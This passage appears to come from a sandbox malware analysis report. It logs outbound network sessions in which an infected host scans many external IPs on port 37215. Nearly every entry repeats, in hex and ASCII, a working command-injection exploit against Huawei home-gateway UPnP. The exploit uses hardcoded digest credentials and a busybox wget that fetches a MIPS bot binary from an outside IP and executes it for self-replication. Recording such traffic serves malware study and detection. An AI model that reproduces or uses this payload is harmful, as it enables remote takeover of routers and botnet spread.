[TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          381192.168.2.1541910197.1.25.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553194046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          382192.168.2.154625485.207.35.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553242922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          383192.168.2.1538592157.48.203.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.557739973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          384192.168.2.153357098.76.71.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.557790995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          385192.168.2.1542360219.29.137.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559108973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          386192.168.2.1546918197.171.92.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559220076 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          387192.168.2.1536136159.90.59.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559243917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          388192.168.2.1545028197.33.226.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559262037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          389192.168.2.155713041.80.237.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559286118 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          390192.168.2.1552440197.16.82.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559299946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          391192.168.2.1535634157.61.215.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.559324980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
